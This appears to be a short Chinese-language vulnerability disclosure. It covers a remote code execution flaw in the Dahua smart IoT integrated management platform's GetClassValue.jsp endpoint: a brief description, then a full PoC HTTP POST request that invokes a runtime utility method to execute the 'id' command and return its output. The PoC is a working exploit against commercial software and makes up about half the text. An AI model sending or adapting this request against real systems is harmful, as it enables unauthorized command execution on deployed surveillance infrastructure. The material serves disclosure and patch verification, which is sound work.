漏洞描述
该漏洞与平台中某个类加载与方法调用的缺陷有关。接口允许通过外部请求动态传入待加载的类名、待执行的方法及相关参数,由于缺乏严格的安全校验和访问控制,攻击者得以在特定条件下执行任意命令。此过程可将执行结果回显到响应中,使攻击者可以验证并利用该漏洞,最终导致远程代码执行。
大华智能物联综合管理平台 GetClassValue 远程代码执行漏洞
PoC代码
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Type: application/json
{
"data": {
"clazzName": "com.dahua.admin.util.RuntimeUtil",
"methodName": "syncexecReturnInputStream",
"fieldName": ["id"]
}
}